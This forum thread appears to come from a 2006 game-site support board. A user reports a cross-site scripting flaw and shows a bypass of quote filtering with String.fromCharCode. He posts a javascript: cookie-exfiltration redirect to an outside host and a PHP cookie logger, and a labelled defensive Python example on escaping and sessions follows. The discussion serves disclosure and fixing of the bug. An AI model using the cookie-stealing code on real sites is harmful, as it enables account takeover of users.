SWLE
Support - Ask here - Yarold

jeremy02 - Fri Jul 07, 2006 12:20 pm
Post subject: Yarold
Anyone have any idea where Yarold is, or when he'll be online next?


Can someone view the dynasties page in IE and tell me if anything happens?

TheNewestJedder - Fri Jul 07, 2006 7:26 pm

I noticed it the past two days. Every time I visit, a Windows message comes up.

jeremy02 - Fri Jul 07, 2006 10:15 pm

What does it say?


Basically, I could be stealing every user's account on this site who uses IE and views the dynasties page.

TheNewestJedder - Sat Jul 08, 2006 12:10 am

the message right there.

jeremy02 - Sat Jul 08, 2006 12:19 am

Yup, that's your cookie data.

TheNewestJedder - Sat Jul 08, 2006 12:25 am

It needs to be fixed now.

TheNewestJedder - Sat Jul 08, 2006 12:29 am

I tried telling our good friend Metalteo, but it seems he is just doing nothing but ignoring me when I tried to alert him of a problem.
Metalteo - Sat Jul 08, 2006 12:53 am

Maybe I don't care.

Go ahead, Jeremy, make my day and do it.

Locked.

Yarold - Tue Jul 11, 2006 8:03 pm

I was moving from Warsaw to my home.
As for the problem: it doesn't look urgent, but like every bug, it's nice to have it fixed.
I'll be thankful if someone can report this to me.
Also, don't blame Metal for bugs in scripts (for which I'm the more suitable person).

Metalteo - Tue Jul 11, 2006 8:41 pm

I already did fix part of the problem. The annoying java pop-up is gone at least.

It's a minor glitch and harmless, but you're right, it's nice if it gets fixed, since some feel the need to play silly games with it.

I'll send you a PM in chat to report it.

jeremy02 - Wed Jul 12, 2006 2:22 am

Yarold wrote:

As for the problem: it doesn't look urgent

Not true. This is the same problem that before allowed me to access hundreds of accounts.

You think it's safe because you now filter ' and ", but you are forgetting about String.fromCharCode.

Yarold - Wed Jul 12, 2006 1:30 pm

But you can only make a popup with your own data (I think?).
jeremy02 - Wed Jul 12, 2006 11:21 pm

Yarold, that is why I would make the code like this.


Code:

javascript:window.location="http://www.site.com/cookie.php?c="+document.cookie



What that does is set the value "c" to the cookie from the site it's redirecting from.


Now, you make cookie.php look like this.


Code:

<?php
$cookie = $_GET['c'];

$fp = fopen("log.htm", 'w');
fwrite($fp, $cookie . "<br>");
fclose($fp);
?>



So now that you wrote the user's cookie to log.htm, you can look at it and replace your own cookie data with theirs, meaning that you will then be logged in as that user.

Yarold - Wed Jul 12, 2006 11:40 pm

Hopefully fixed this one.

(From version 0.72, cookie data from other people is not very useful.)

jeremy02 - Thu Jul 13, 2006 12:01 am

Well I'd check for you to see if it's still exploitable, but of course Metalteo deleted my dynasty.


EDIT:

The only time cookie data isn't useful is when you validate the session somehow.
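Both halves of jeremy02's point, as an added example that is not code from this thread or from the site it discusses: a filter that only strips ' and " leaves markup intact while contextual HTML escaping does not, and an opaque server-side session delivered in an HttpOnly cookie is what "validating the session" looks like, so a copied cookie value is not by itself a login. The function names and the sample dynasty name are constructed for illustration.

```python
import html
import re
import secrets
from typing import Optional

# Constructed sample input: a dynasty name carrying markup but no ' or " at all,
# so the quote-stripping filter below returns it unchanged.
CONSTRUCTED_NAME = "Jedder<script>probe()</script>"


def strip_quotes(text: str) -> str:
    """Blacklist filter of the kind the thread describes: removes only ' and "."""
    return text.replace("'", "").replace('"', "")


def escape_for_html(text: str) -> str:
    """Contextual output encoding: <, >, &, ' and " become entities, so the
    browser renders the name as text and never sees a tag or attribute."""
    return html.escape(text, quote=True)


def contains_script_tag(rendered: str) -> bool:
    """Does the HTML that would reach the browser still contain a live <script> tag?"""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


class SessionStore:
    """Server-side session table. The cookie carries only an opaque random id; the
    user identity and expiry live on the server, so the id can be dropped at any
    time and a copied cookie stops working when the session does."""

    def __init__(self, ttl_seconds: int = 3600) -> None:
        self._sessions = {}
        self.ttl = ttl_seconds

    def create(self, user_id: str, now: float) -> str:
        sid = secrets.token_urlsafe(32)  # 256 random bits: not derivable from user data
        self._sessions[sid] = {"user": user_id, "expires": now + self.ttl}
        return sid

    def user_for(self, sid: str, now: float) -> Optional[str]:
        entry = self._sessions.get(sid)
        if entry is None or now >= entry["expires"]:
            self._sessions.pop(sid, None)  # unknown or expired: treat as logged out
            return None
        return entry["user"]


def session_cookie_header(sid: str, ttl_seconds: int) -> str:
    """Set-Cookie value for the id. HttpOnly keeps it out of document.cookie, so a
    script injected into a page cannot read it; Secure and SameSite limit where
    the browser will send it."""
    return f"sid={sid}; Max-Age={ttl_seconds}; Path=/; HttpOnly; Secure; SameSite=Lax"
```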


Powered by phpBB modified by Przemo © 2003 phpBB Group